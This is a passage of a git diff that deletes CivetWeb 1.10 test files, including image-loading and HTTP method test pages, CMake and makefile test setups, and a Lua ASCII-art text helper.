-          <td><img src="imagetest/80.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/81.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/82.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/83.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/84.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/85.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/86.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/87.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/88.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/89.png?ts=]]..ts..[["></td>
-        </tr>
-]])
-mg.write([[
-        <tr>
-          <td><img src="imagetest/90.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/91.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/92.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/93.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/94.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/95.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/96.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/97.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/98.png?ts=]]..ts..[["></td>
-          <td><img src="imagetest/99.png?ts=]]..ts..[["></td>
-        </tr>
-      </table>
-]])
-end
-mg.write([[
-    </p>
-    <p id="timing">
-      Test case: all images are displayed.
-    </p>
-  </body>
-</html>
-]])
diff --git a/thirdparty/civetweb-1.10/test/100images.htm b/thirdparty/civetweb-1.10/test/100images.htm
deleted file mode 100644
index 9e433f6..0000000
--- a/thirdparty/civetweb-1.10/test/100images.htm
+++ /dev/null
@@ -1,160 +0,0 @@
-<html>
-
-  <!-- Test case description:                              -->
-  <!-- This test contains 100 small images in a table.     -->
-  <!-- Once a browser opens the html file, it will request -->
-  <!-- all these images from the server very quickly.      -->
-  <!-- Depending on the "keep-alive" settings, it will     -->
-  <!-- either open/close 100 connections quite rapidly     -->
-  <!-- if keep-alive=no, or otherwise establish only a few -->
-  <!-- connections, typically one or two, and reuse them.  -->
-  <!-- If the test succeeds, all 100 images are displayed. -->
-  <!-- The loading time is measured automatically in the   -->
-  <!-- browser using JavaScript. Note that the load times  -->
-  <!-- also differs between HTTP and HTTPS.                -->
-
-  <head>
-    <title>100 images</title>
-    <script type="text/javascript">
-      var startLoad = Date.now();
-      window.onload = function () {
-        var loadTime = (Date.now()-startLoad) + " ms";
-        document.getElementById('timing').innerHTML = loadTime;
-      }
-    </script>
-  </head>
-  <body>
-    <h1>A gallery of small images:</h1>
-    <p>
-      <table>
-        <tr>
-          <td><img src="imagetest/00.png"></td>
-          <td><img src="imagetest/01.png"></td>
-          <td><img src="imagetest/02.png"></td>
-          <td><img src="imagetest/03.png"></td>
-          <td><img src="imagetest/04.png"></td>
-          <td><img src="imagetest/05.png"></td>
-          <td><img src="imagetest/06.png"></td>
-          <td><img src="imagetest/07.png"></td>
-          <td><img src="imagetest/08.png"></td>
-          <td><img src="imagetest/09.png"></td>
-        </tr>
-        <tr>
-          <td><img src="imagetest/10.png"></td>
-          <td><img src="imagetest/11.png"></td>
-          <td><img src="imagetest/12.png"></td>
-          <td><img src="imagetest/13.png"></td>
-          <td><img src="imagetest/14.png"></td>
-          <td><img src="imagetest/15.png"></td>
-          <td><img src="imagetest/16.png"></td>
-          <td><img src="imagetest/17.png"></td>
-          <td><img src="imagetest/18.png"></td>
-          <td><img src="imagetest/19.png"></td>
-        </tr>
-        <tr>
-          <td><img src="imagetest/20.png"></td>
-          <td><img src="imagetest/21.png"></td>
-          <td><img src="imagetest/22.png"></td>
-          <td><img src="imagetest/23.png"></td>
-          <td><img src="imagetest/24.png"></td>
-          <td><img src="imagetest/25.png"></td>
-          <td><img src="imagetest/26.png"></td>
-          <td><img src="imagetest/27.png"></td>
-          <td><img src="imagetest/28.png"></td>
-          <td><img src="imagetest/29.png"></td>
-        </tr>
-        <tr>
-          <td><img src="imagetest/30.png"></td>
-          <td><img src="imagetest/31.png"></td>
-          <td><img src="imagetest/32.png"></td>
-          <td><img src="imagetest/33.png"></td>
-          <td><img src="imagetest/34.png"></td>
-          <td><img src="imagetest/35.png"></td>
-          <td><img src="imagetest/36.png"></td>
-          <td><img src="imagetest/37.png"></td>
-          <td><img src="imagetest/38.png"></td>
-          <td><img src="imagetest/39.png"></td>
-        </tr>
-        <tr>
-          <td><img src="imagetest/40.png"></td>
-          <td><img src="imagetest/41.png"></td>
-          <td><img src="imagetest/42.png"></td>
-          <td><img src="imagetest/43.png"></td>
-          <td><img src="imagetest/44.png"></td>
-          <td><img src="imagetest/45.png"></td>
-          <td><img src="imagetest/46.png"></td>
-          <td><img src="imagetest/47.png"></td>
-          <td><img src="imagetest/48.png"></td>
-          <td><img src="imagetest/49.png"></td>
-        </tr>
-        <tr>
-          <td><img src="imagetest/50.png"></td>
-          <td><img src="imagetest/51.png"></td>
-          <td><img src="imagetest/52.png"></td>
-          <td><img src="imagetest/53.png"></td>
-          <td><img src="imagetest/54.png"></td>
-          <td><img src="imagetest/55.png"></td>
-          <td><img src="imagetest/56.png"></td>
-          <td><img src="imagetest/57.png"></td>
-          <td><img src="imagetest/58.png"></td>
-          <td><img src="imagetest/59.png"></td>
-        </tr>
-        <tr>
-          <td><img src="imagetest/60.png"></td>
-          <td><img src="imagetest/61.png"></td>
-          <td><img src="imagetest/62.png"></td>
-          <td><img src="imagetest/63.png"></td>
-          <td><img src="imagetest/64.png"></td>
-          <td><img src="imagetest/65.png"></td>
-          <td><img src="imagetest/66.png"></td>
-          <td><img src="imagetest/67.png"></td>
-          <td><img src="imagetest/68.png"></td>
-          <td><img src="imagetest/69.png"></td>
-        </tr>
-        <tr>
-          <td><img src="imagetest/70.png"></td>
-          <td><img src="imagetest/71.png"></td>
-          <td><img src="imagetest/72.png"></td>
-          <td><img src="imagetest/73.png"></td>
-          <td><img src="imagetest/74.png"></td>
-          <td><img src="imagetest/75.png"></td>
-          <td><img src="imagetest/76.png"></td>
-          <td><img src="imagetest/77.png"></td>
-          <td><img src="imagetest/78.png"></td>
-          <td><img src="imagetest/79.png"></td>
-        </tr>
-        <tr>
-          <td><img src="imagetest/80.png"></td>
-          <td><img src="imagetest/81.png"></td>
-          <td><img src="imagetest/82.png"></td>
-          <td><img src="imagetest/83.png"></td>
-          <td><img src="imagetest/84.png"></td>
-          <td><img src="imagetest/85.png"></td>
-          <td><img src="imagetest/86.png"></td>
-          <td><img src="imagetest/87.png"></td>
-          <td><img src="imagetest/88.png"></td>
-          <td><img src="imagetest/89.png"></td>
-        </tr>
-        <tr>
-          <td><img src="imagetest/90.png"></td>
-          <td><img src="imagetest/91.png"></td>
-          <td><img src="imagetest/92.png"></td>
-          <td><img src="imagetest/93.png"></td>
-          <td><img src="imagetest/94.png"></td>
-          <td><img src="imagetest/95.png"></td>
-          <td><img src="imagetest/96.png"></td>
-          <td><img src="imagetest/97.png"></td>
-          <td><img src="imagetest/98.png"></td>
-          <td><img src="imagetest/99.png"></td>
-        </tr>
-      </table>
-    </p>
-    <p id="timing">
-      Test case: all images are displayed.
-    </p>
-    <p id="navigation">
-      <button onclick="window.history.back()">back</button>
-      <button onclick="location.reload()">reload</button>
-    </p>
-  </body>
-</html>
diff --git a/thirdparty/civetweb-1.10/test/CMakeLists.txt b/thirdparty/civetweb-1.10/test/CMakeLists.txt
deleted file mode 100644
index 964c4e3..0000000
--- a/thirdparty/civetweb-1.10/test/CMakeLists.txt
+++ /dev/null
@@ -1,246 +0,0 @@
-# Determine if we should print to the output
-if (CIVETWEB_ENABLE_THIRD_PARTY_OUTPUT)
-  set(THIRD_PARTY_LOGGING 0)
-else()
-  set(THIRD_PARTY_LOGGING 1)
-endif()
-
-# We use the check unit testing framework for our C unit tests
-include(ExternalProject)
-#if(NOT WIN32)
-#  # Apply the patch to check to fix CMake building on OS X
-#  set(CHECK_PATCH_COMMAND patch
-#     ${CIVETWEB_THIRD_PARTY_DIR}/src/check-unit-test-framework/CMakeLists.txt
-#     ${CMAKE_SOURCE_DIR}/cmake/check/c82fe8888aacfe784476112edd3878256d2e30bc.patch
-#   )
-#else()
-#  set(CHECK_PATCH_COMMAND "")
-#endif()
-ExternalProject_Add(check-unit-test-framework
-  DEPENDS c-library
-
-## Use an official, released check version:
-#  URL "https://codeload.github.com/libcheck/check/zip/${CIVETWEB_CHECK_VERSION}"
-#  DOWNLOAD_NAME "${CIVETWEB_CHECK_VERSION}.zip"
-#  URL_MD5 ${CIVETWEB_CHECK_MD5_HASH}
-
-## Use a civetweb specific patched version
-URL "https://github.com/civetweb/check/archive/master.zip"
-DOWNLOAD_NAME "master.zip"
-# <Edit this file to flush AppVeyor build cache and force reloading check>
-
-  PREFIX "${CIVETWEB_THIRD_PARTY_DIR}"
-  BUILD_IN_SOURCE 1
-  PATCH_COMMAND ${CHECK_PATCH_COMMAND}
-  CMAKE_ARGS
-    "-DCMAKE_BUILD_TYPE=${CMAKE_BUILD_TYPE}"
-    "-DCMAKE_C_COMPILER=${CMAKE_C_COMPILER}"
-    "-DCMAKE_INSTALL_PREFIX=<INSTALL_DIR>"
-  LOG_DOWNLOAD ${THIRD_PARTY_LOGGING}
-  LOG_UPDATE ${THIRD_PARTY_LOGGING}
-  LOG_CONFIGURE ${THIRD_PARTY_LOGGING}
-  LOG_BUILD ${THIRD_PARTY_LOGGING}
-  LOG_TEST ${THIRD_PARTY_LOGGING}
-  LOG_INSTALL ${THIRD_PARTY_LOGGING})
-
-ExternalProject_Get_Property(check-unit-test-framework INSTALL_DIR)
-set(CHECK_INSTALL_DIR ${INSTALL_DIR})
-unset(INSTALL_DIR)
-link_directories("${CHECK_INSTALL_DIR}/lib")
-include_directories("${CHECK_INSTALL_DIR}/include")
-if ((WIN32 AND MINGW) OR APPLE)
-  set(CHECK_LIBRARIES "${CHECK_LIBRARIES};${CHECK_INSTALL_DIR}/lib/libcheck.a")
-  set(CHECK_LIBRARIES "${CHECK_LIBRARIES};${CHECK_INSTALL_DIR}/lib/libcompat.a")
-elseif (WIN32)
-  set(CHECK_LIBRARIES "${CHECK_LIBRARIES};${CHECK_INSTALL_DIR}/lib/check.lib")
-  set(CHECK_LIBRARIES "${CHECK_LIBRARIES};${CHECK_INSTALL_DIR}/lib/compat.lib")
-else()
-  set(CHECK_LIBRARIES "${CHECK_INSTALL_DIR}/lib/libcheck.a")
-endif()
-find_package(LibM)
-if (LIBM_FOUND)
-  set(CHECK_LIBRARIES "${CHECK_LIBRARIES};LIBM::LIBM")
-endif()
-find_package(LibRt)
-if (LIBRT_FOUND)
-  set(CHECK_LIBRARIES "${CHECK_LIBRARIES};LIBRT::LIBRT")
-endif()
-
-# Build the C unit tests
-add_library(shared-c-unit-tests STATIC shared.c)
-target_include_directories(
-  shared-c-unit-tests PUBLIC
-  ${PROJECT_SOURCE_DIR}/include)
-
-add_library(public-func-c-unit-tests STATIC public_func.c)
-if (BUILD_SHARED_LIBS)
-  target_compile_definitions(public-func-c-unit-tests PRIVATE CIVETWEB_DLL_IMPORTS)
-endif()
-target_include_directories(
-  public-func-c-unit-tests PUBLIC
-  ${PROJECT_SOURCE_DIR}/include)
-target_link_libraries(public-func-c-unit-tests c-library ${CHECK_LIBRARIES})
-add_dependencies(public-func-c-unit-tests check-unit-test-framework)
-
-add_library(public-server-c-unit-tests STATIC public_server.c)
-if (BUILD_SHARED_LIBS)
-  target_compile_definitions(public-server-c-unit-tests PRIVATE CIVETWEB_DLL_IMPORTS)
-endif()
-target_include_directories(
-  public-server-c-unit-tests PUBLIC
-  ${PROJECT_SOURCE_DIR}/include)
-target_link_libraries(public-server-c-unit-tests c-library ${CHECK_LIBRARIES})
-add_dependencies(public-server-c-unit-tests check-unit-test-framework)
-
-add_library(private-c-unit-tests STATIC private.c)
-target_include_directories(
-  private-c-unit-tests PUBLIC
-  ${PROJECT_SOURCE_DIR}/include)
-target_link_libraries(private-c-unit-tests ${CHECK_LIBRARIES})
-add_dependencies(private-c-unit-tests check-unit-test-framework)
-
-add_library(timer-c-unit-tests STATIC timertest.c)
-target_include_directories(
-  timer-c-unit-tests PUBLIC
-  ${PROJECT_SOURCE_DIR}/include)
-target_link_libraries(timer-c-unit-tests ${CHECK_LIBRARIES})
-add_dependencies(timer-c-unit-tests check-unit-test-framework)
-
-add_library(exe-c-unit-tests STATIC private_exe.c)
-if (BUILD_SHARED_LIBS)
-  target_compile_definitions(exe-c-unit-tests PRIVATE)
-endif()
-target_include_directories(
-  exe-c-unit-tests PUBLIC
-  ${PROJECT_SOURCE_DIR}/include)
-target_link_libraries(exe-c-unit-tests c-library ${CHECK_LIBRARIES})
-add_dependencies(exe-c-unit-tests check-unit-test-framework)
-
-add_executable(main-c-unit-test main.c)
-target_link_libraries(main-c-unit-test
-  shared-c-unit-tests
-  public-func-c-unit-tests
-  public-server-c-unit-tests
-  private-c-unit-tests
-  timer-c-unit-tests
-  exe-c-unit-tests
-  ${CHECK_LIBRARIES})
-add_dependencies(main-c-unit-test check-unit-test-framework)
-
-# Add a check command that builds the dependent test program
-add_custom_target(check-civetweb
-  COMMAND ${CMAKE_CTEST_COMMAND}
-  DEPENDS main-c-unit-test)
-
-# A macro for adding tests
-macro(civetweb_add_test suite test_case)
-  set(test "test-${suite}-${test_case}")
-  string(TOLOWER "${test}" test)
-  string(REGEX REPLACE "[^-A-Za-z0-9]" "-" test "${test}")
-  add_test(
-    NAME ${test}
-    COMMAND main-c-unit-test "--test-dir=${CMAKE_CURRENT_SOURCE_DIR}" "--suite=${suite}" "--test-case=${test_case}")
-  if (WIN32)
-    string(REPLACE ";" "\\;" test_path "$ENV{PATH}")
-    set_tests_properties(${test} PROPERTIES
-      ENVIRONMENT "PATH=${test_path}\\;$<TARGET_FILE_DIR:c-library>")
-  endif()
-endmacro(civetweb_add_test)
-
-
-# Tests of private functions
-civetweb_add_test(Private "HTTP Message")
-civetweb_add_test(Private "HTTP Keep Alive")
-civetweb_add_test(Private "URL Parsing 1")
-civetweb_add_test(Private "URL Parsing 2")
-civetweb_add_test(Private "URL Parsing 3")
-civetweb_add_test(Private "Internal Parsing 1")
-civetweb_add_test(Private "Internal Parsing 2")
-civetweb_add_test(Private "Internal Parsing 3")
-civetweb_add_test(Private "Internal Parsing 4")
-civetweb_add_test(Private "Internal Parsing 5")
-civetweb_add_test(Private "Internal Parsing 6")
-civetweb_add_test(Private "Encode Decode")
-civetweb_add_test(Private "Mask Data")
-civetweb_add_test(Private "Date Parsing")
-civetweb_add_test(Private "SHA1")
-
-# Public API function tests
-civetweb_add_test(PublicFunc "Version")
-civetweb_add_test(PublicFunc "Options")
-civetweb_add_test(PublicFunc "MIME types")
-civetweb_add_test(PublicFunc "strcasecmp")
-civetweb_add_test(PublicFunc "URL encoding decoding")
-civetweb_add_test(PublicFunc "Cookies and variables")
-civetweb_add_test(PublicFunc "MD5")
-civetweb_add_test(PublicFunc "Aux functions")
-
-# Public API server tests
-civetweb_add_test(PublicServer "Check test environment")
-civetweb_add_test(PublicServer "Init library")
-civetweb_add_test(PublicServer "Start threads")
-civetweb_add_test(PublicServer "Minimal Server")
-civetweb_add_test(PublicServer "Minimal Client")
-civetweb_add_test(PublicServer "Start Stop HTTP Server")
-civetweb_add_test(PublicServer "Start Stop HTTP Server IPv6")
-civetweb_add_test(PublicServer "Start Stop HTTPS Server")
-civetweb_add_test(PublicServer "TLS Server Client")
-civetweb_add_test(PublicServer "Server Requests")
-civetweb_add_test(PublicServer "Store Body")
-civetweb_add_test(PublicServer "Handle Form")
-civetweb_add_test(PublicServer "HTTP Authentication")
-civetweb_add_test(PublicServer "HTTP Keep Alive")
-civetweb_add_test(PublicServer "Error handling")
-civetweb_add_test(PublicServer "Limit speed")
-civetweb_add_test(PublicServer "Large file")
-civetweb_add_test(PublicServer "File in memory")
-
-# Timer tests
-civetweb_add_test(Timer "Timer Single Shot")
-civetweb_add_test(Timer "Timer Periodic")
-civetweb_add_test(Timer "Timer Mixed")
-
-# Tests with main.c
-#civetweb_add_test(EXE "Helper funcs")
-
-
-# Add the coverage command(s)
-if (${CMAKE_BUILD_TYPE} MATCHES "[Cc]overage")
-  find_program(GCOV_EXECUTABLE gcov)
-  find_program(LCOV_EXECUTABLE lcov)
-  find_program(GENHTML_EXECUTABLE genhtml)
-  find_program(CTEST_EXECUTABLE ctest)
-  if (GCOV_EXECUTABLE AND LCOV_EXECUTABLE AND GENHTML_EXECUTABLE AND CTEST_EXECUTABLE AND HAVE_C_FLAG_COVERAGE)
-    add_custom_command(
-      OUTPUT ${CMAKE_BINARY_DIR}/lcov/index.html
-      COMMAND ${LCOV_EXECUTABLE} -q -z -d .
-      COMMAND ${LCOV_EXECUTABLE} -q --no-external -c -b "${CMAKE_SOURCE_DIR}" -d . -o before.lcov -i
-      COMMAND ${CTEST_EXECUTABLE} --force-new-ctest-process
-      COMMAND ${LCOV_EXECUTABLE} -q --no-external -c -b "${CMAKE_SOURCE_DIR}" -d . -o after.lcov
-      COMMAND ${LCOV_EXECUTABLE} -q -a before.lcov -a after.lcov --output-file final.lcov
-      COMMAND ${LCOV_EXECUTABLE} -q -r final.lcov "'${CMAKE_SOURCE_DIR}/test/*'" -o final.lcov
-      COMMAND ${GENHTML_EXECUTABLE} final.lcov -o lcov --demangle-cpp --sort -p "${CMAKE_SOURCE_DIR}" -t benchmark
-      DEPENDS main-c-unit-test
-      WORKING_DIRECTORY ${CMAKE_BINARY_DIR}
-      COMMENT "Running LCOV"
-    )
-    add_custom_target(coverage
-      DEPENDS ${CMAKE_BINARY_DIR}/lcov/index.html
-      COMMENT "LCOV report at lcov/index.html"
-    )
-    message(STATUS "Coverage command added")
-  else()
-    if (HAVE_C_FLAG_COVERAGE)
-      set(C_FLAG_COVERAGE_MESSAGE supported)
-    else()
-      set(C_FLAG_COVERAGE_MESSAGE unavailable)
-    endif()
-    message(WARNING
-      "Coverage command not available:\n"
-      "  gcov: ${GCOV_EXECUTABLE}\n"
-      "  lcov: ${LCOV_EXECUTABLE}\n"
-      "  genhtml: ${GENHTML_EXECUTABLE}\n"
-      "  ctest: ${CTEST_EXECUTABLE}\n"
-      "  --coverage flag: ${C_FLAG_COVERAGE_MESSAGE}")
-  endif()
-endif()
diff --git a/thirdparty/civetweb-1.10/test/HugeText.lua b/thirdparty/civetweb-1.10/test/HugeText.lua
deleted file mode 100644
index 0fa57f1..0000000
--- a/thirdparty/civetweb-1.10/test/HugeText.lua
+++ /dev/null
@@ -1,149 +0,0 @@
--- (c) bel2125, 2010

--- MIT public licence

-

-

-local letterCode = {

-  [' '] = {0,0,0,0,0},

-  ['!'] = {0,0,95,0,0},

-  ['"'] = {0,3,4,3,0},

-  ['#'] = {34,127,34,127,34},

-  ['$'] = {36,42,127,42,18},

-  ['%'] = {35,19,8,100,98},

-  ['&'] = {54,73,85,34,80},

-  ["'"] = {0,11,7,0,0},

-  ['('] = {0,28,34,65,0},

-  [')'] = {0,65,34,28,0},

-  ['*'] = {20,8,62,8,20},

-  ['+'] = {8,8,62,8,8},

-  [','] = {0,88,56,0,0},

-  ['-'] = {8,8,8,8,8},

-  ['.'] = {0,96,96,0,0},

-  ['/'] = {32,16,8,4,2},

-  ['0'] = {62,81,73,69,62},

-  ['1'] = {0,66,127,64,0},

-  ['2'] = {66,97,81,73,70},

-  ['3'] = {65,73,77,75,49},

-  ['4'] = {24,20,18,127,16},

-  ['5'] = {39,69,69,69,57},

-  ['6'] = {60,74,73,73,48},

-  ['7'] = {1,1,121,5,3},

-  ['8'] = {54,73,73,73,54},

-  ['9'] = {6,73,73,41,30},

-  [':'] = {0,54,54,0,0},

-  [';'] = {0,91,59,0,0},

-  ['<'] = {8,20,34,65,0},

-  ['='] = {20,20,20,20,20},

-  ['>'] = {0,65,34,20,8},

-  ['?'] = {2,1,81,9,6},

-  ['@'] = {50,73,121,65,62},

-  ['A'] = {124,18,17,18,124},

-  ['B'] = {65,127,73,73,54},

-  ['C'] = {62,65,65,65,34},

-  ['D'] = {65,127,65,65,62},

-  ['E'] = {127,73,73,73,65},

-  ['F'] = {127,9,9,9,1},

-  ['G'] = {62,65,65,73,57},

-  ['H'] = {127,8,8,8,127},

-  ['I'] = {0,65,127,65,0},

-  ['J'] = {32,64,65,63,1},

-  ['K'] = {127,8,20,34,65},

-  ['L'] = {127,64,64,64,64},

-  ['M'] = {127,2,12,2,127},

-  ['N'] = {127,4,8,16,127},

-  ['O'] = {62,65,65,65,62},

-  ['P'] = {127,9,9,9,6},

-  ['Q'] = {62,65,81,33,94},

-  ['R'] = {127,9,25,41,70},

-  ['S'] = {38,73,73,73,50},

-  ['T'] = {1,1,127,1,1},

-  ['U'] = {63,64,64,64,63},

-  ['V'] = {7,24,96,24,7},

-  ['W'] = {127,32,24,32,127},

-  ['X'] = {99,20,8,20,99},

-  ['Y'] = {3,4,120,4,3},

-  ['Z'] = {97,81,73,69,67},

-  ['['] = {0,127,65,65,0},

-  ['\\'] = {2,4,8,16,32},

-  [']'] = {0,65,65,127,0},

-  ['^'] = {24,4,2,4,24},

-  ['_'] = {64,64,64,64,64},

-  ['`'] = {0,0,7,11,0},

-  ['a'] = {56,68,68,60,64},

-  ['b'] = {127,72,68,68,56},

-  ['c'] = {56,68,68,68,32},

-  ['d'] = {56,68,68,72,127},

-  ['e'] = {56,84,84,84,24},

-  ['f'] = {0,8,126,9,2},

-  ['g'] = {8,84,84,60,0},

-  ['h'] = {127,4,4,120,0},

-  ['i'] = {0,0,125,0,0},

-  ['j'] = {32,64,68,61,0},

-  ['k'] = {127,16,40,68,0},

-  ['l'] = {0,0,127,0,0},

-  ['m'] = {120,4,120,4,120},

-  ['n'] = {124,8,4,4,120},

-  ['o'] = {56,68,68,68,56},

-  ['p'] = {124,20,20,20,8},

-  ['q'] = {24,36,20,124,64},

-  ['r'] = {124,8,4,4,0},

-  ['s'] = {72,84,84,84,32},

-  ['t'] = {4,62,68,32,0},

-  ['u'] = {60,64,64,32,124},

-  ['v'] = {28,32,64,32,28},

-  ['w'] = {60,64,48,64,60},

-  ['x'] = {68,36,124,72,68},

-  ['y'] = {12,80,80,60,0},

-  ['z'] = {68,100,84,76,68},

-  ['{'] = {0,8,54,65,0},

-  ['|'] = {0,0,119,0,0},

-  ['}'] = {0,65,54,8,0},

-  ['~'] = {8,4,8,16,8},

-};

-

-letterCode['('] = {0,60,66,129,0}

-letterCode[')'] = {0,129,66,60,0}

-letterCode[','] = {0,176,112,0,0}

-letterCode[';'] = {0,182,118,0,0}

-letterCode['['] = {0,255,129,129,0}

-letterCode[']'] = {0,129,129,255,0}

-letterCode['_'] = {128,128,128,128,128}

-letterCode['g'] = {24,164,164,124,0}

-letterCode['j'] = {64,128,132,125,0}

-letterCode['p'] = {252,36,36,36,24}

-letterCode['q'] = {24,36,36,252,128}

-letterCode['y'] = {12,80,80,60,0}

-letterCode['{'] = {0,24,102,129,0}

-letterCode['}'] = {0,129,102,24,0}

-

-

-local function HugeLetter(letter)

-  if letter==' ' then return {"  ", "  ", "  ", "  ", "  ", "  ", "  ", "  "} end

-  local code = letterCode[letter]  

-  local str = {"", "", "", "", "", "", "", ""}

-  for i=1,5 do

-    local n = code[i]

-    if n and n>0 then

-      for b=1,8 do

-        if bit32.btest(n, bit32.lshift(1, b-1)) then str[b] = str[b] .. letter else str[b] = str[b] .. ' ' end

-      end

-    end

-  end

-  return str

-end

-

-function HugeText(str)

-  local txt = {"", "", "", "", "", "", "", ""}

-  for i=1,string.len(str) do

-    local s = HugeLetter(str:sub(i,i))

-    for b=1,8 do

-      if i>1 then

-        txt[b] = txt[b] .. "   " .. s[b]

-      else

-        txt[b] = txt[b] .. s[b]

-      end

-    end

-  end

-  return txt

-end

-

-return HugeText

diff --git a/thirdparty/civetweb-1.10/test/MakefileTest.mk b/thirdparty/civetweb-1.10/test/MakefileTest.mk
deleted file mode 100644
index 08d8e33..0000000
--- a/thirdparty/civetweb-1.10/test/MakefileTest.mk
+++ /dev/null
@@ -1,88 +0,0 @@
-# 
-# Copyright (c) 2013 No Face Press, LLC
-# License http://opensource.org/licenses/mit-license.php MIT License
-#
-
-#This makefile is used to test the other Makefiles
-
-TOP = ..
-TEST_OUT = test_install
-
-include $(TOP)/resources/Makefile.in-os
-
-all: test
-
-test: buildoptions buildlibs buildinstall
-test: buildexamples threaded
-
-ifeq ($(TARGET_OS),OSX)
-test: dmg
-endif
-
-test: clean
-	@echo PASSED
-
-dmg:
-	@echo "================"
-	$(MAKE) -C $(TOP) -f Makefile.osx clean package
-
-buildexamples:
-	@echo "================"
-	$(MAKE) -C $(TOP)/examples/embedded_c clean all
-	$(MAKE) -C $(TOP)/examples/embedded_c clean
-	@echo "================"
-	$(MAKE) -C $(TOP)/examples/embedded_cpp clean all
-	$(MAKE) -C $(TOP)/examples/embedded_cpp clean
-	@echo "================"
-	$(MAKE) -C $(TOP)/examples/chat clean all
-	$(MAKE) -C $(TOP)/examples/chat clean
-	@echo "================"
-	$(MAKE) -C $(TOP)/examples/hello clean all
-	$(MAKE) -C $(TOP)/examples/hello clean
-	@echo "================"
-	$(MAKE) -C $(TOP)/examples/post clean all
-	$(MAKE) -C $(TOP)/examples/post clean
-	@echo "================"
-	$(MAKE) -C $(TOP)/examples/upload clean all
-	$(MAKE) -C $(TOP)/examples/upload clean
-	@echo "================"
-	$(MAKE) -C $(TOP)/examples/websocket clean all
-	$(MAKE) -C $(TOP)/examples/websocket clean
-
-buildoptions:
-	@echo "================"
-	$(MAKE) -C $(TOP) clean build
-	@echo "================"
-	$(MAKE) -C $(TOP) clean build WITH_IPV6=1
-	@echo "================"
-	$(MAKE) -C $(TOP) clean build WITH_WEBSOCKET=1
-	@echo "================"
-	$(MAKE) -C $(TOP) clean build WITH_LUA=1
-	@echo "================"
-	$(MAKE) -C $(TOP) clean build WITH_LUA=1 WITH_IPV6=1 WITH_WEBSOCKET=1
-
-threaded:
-	@echo "================"
-	$(MAKE) -j 8 -C $(TOP) clean WITH_LUA=1
-	$(MAKE) -j 8 -C $(TOP) build WITH_LUA=1
-
-buildinstall:
-	@echo "================"
-	$(MAKE) -C $(TOP) clean install PREFIX=$(TEST_OUT)
-
-buildlibs:
-	@echo "================"
-	$(MAKE) -C $(TOP) clean lib
-	@echo "================"
-	$(MAKE) -C $(TOP) clean slib
-	@echo "================"
-	$(MAKE) -C $(TOP) clean lib WITH_CPP=1
-	@echo "================"
-	$(MAKE) -C $(TOP) clean slib WITH_CPP=1
-
-clean:
-	@echo "================"
-	$(MAKE) -C $(TOP) clean
-	rm -rf $(TOP)/$(TEST_OUT)
-
-.PHONY: all buildoptions buildinstall clean os linux
diff --git a/thirdparty/civetweb-1.10/test/MethodTest.xhtml b/thirdparty/civetweb-1.10/test/MethodTest.xhtml
deleted file mode 100644
index b9365e2..0000000
--- a/thirdparty/civetweb-1.10/test/MethodTest.xhtml
+++ /dev/null
@@ -1,200 +0,0 @@
-<!DOCTYPE HTML>

-<html xmlns="http://www.w3.org/1999/xhtml">

-<head>

-<meta http-equiv="content-type" content="text/html; charset=UTF-8" />

-  <title>HTTP method test</title>

-  <style type="text/css" media="screen">

-    body {background:#eee; margin:0%; padding:0%; padding-top:0%; padding-left:1%}

-    .cform {margin:0%; padding:0%; padding-top:0%; padding-left:2%;}

-    h3 {margin:0%; padding:0%; padding-top:0%; padding-left:0%;}

-    td {vertical-align:top; text-align:left;}

-  </style>

-  <script type="text/javascript"><![CDATA[

-

-    function getParams() {

-      var result = {};

-      var kvPairs = location.search.slice(1).split('&');

-

-      kvPairs.forEach(

-        function(kvPair) {

-          kvPair = kvPair.split('=');

-          result[kvPair[0]] = kvPair[1] || '';

-        }

-      );

-

-      return result;

-    }

-

-    function noBody() {

-      document.getElementById("body_none").checked = true;

-    }

-

-    function load() {

-      var params = getParams();

-      var method = params["method"];

-      if (!method) {

-        method = "GET";

-      }

-      var path = params["path"];

-      if (!path) {

-        path = "";

-      }

-

-      var elem = document.getElementById('h1');

-      elem.innerHTML = "HTTP method test page";

-

-      document.getElementById("proto_http").checked = (window.location.protocol != "https:");

-      document.getElementById("proto_https").checked = (window.location.protocol == "https:");

-      document.getElementById("server").value = location.host;

-      document.getElementById("resource").value = path;

-

-      setRadioValue("method", method);

-      noBody();

-    }

-

-    function setRadioValue(elmname, value) {

-      var elms = document.getElementsByName(elmname);

-      var len = elms.length;

-      var ret = false;

-

-      for (var i=0; i<len; i++) {

-        elms[i].checked = (elms[i].value == value);

-        ret |= elms[i].checked;

-      }

-      return ret;

-    }

-

-    function getRadioValue(elmname) {

-

-      var elms = document.getElementsByName(elmname);

-      var len = elms.length;

-      var ret = "";

-

-      for (var i=0; i<len; i++) {

-        if (elms[i].checked) {

-          ret = elms[i].value;

-        }

-      }

-      return ret;

-    }

-

-    function sendreq() {

-      var proto = getRadioValue("protocol");

-      var host = document.getElementById("server").value;

-      var res = document.getElementById("resource").value;

-      var addr = proto + "://" + host + "/" + res;

-      var meth = getRadioValue("method");

-      var body = getRadioValue("body");

-

-      xmlhttp = new XMLHttpRequest();

-      if (!xmlhttp) {

-        alert("XMLHttpRequest not available");

-        window.history.back();

-      }

-

-      xmlhttp.open(meth,addr,true);

-

-      if (body == '*') {

-        body = null;

-      } else {

-        if (body == '**') {

-          var body_bytes = document.getElementById("body_bytes").value;

-          body_bytes = parseInt(Number(body_bytes) || 0) || 0;

-          body = "";

-          for (var i=0; i<body_bytes; i++) {

-            var ascii = Math.floor((Math.random() * 94) + 32);

-            body = body + String.fromCharCode(ascii);

-          }

-        }

-        xmlhttp.setRequestHeader("Content-Length", body.length);

-      }

-

-      xmlhttp.onreadystatechange = function()

-      {

-          var laddr = addr;

-          var lmeth = meth;

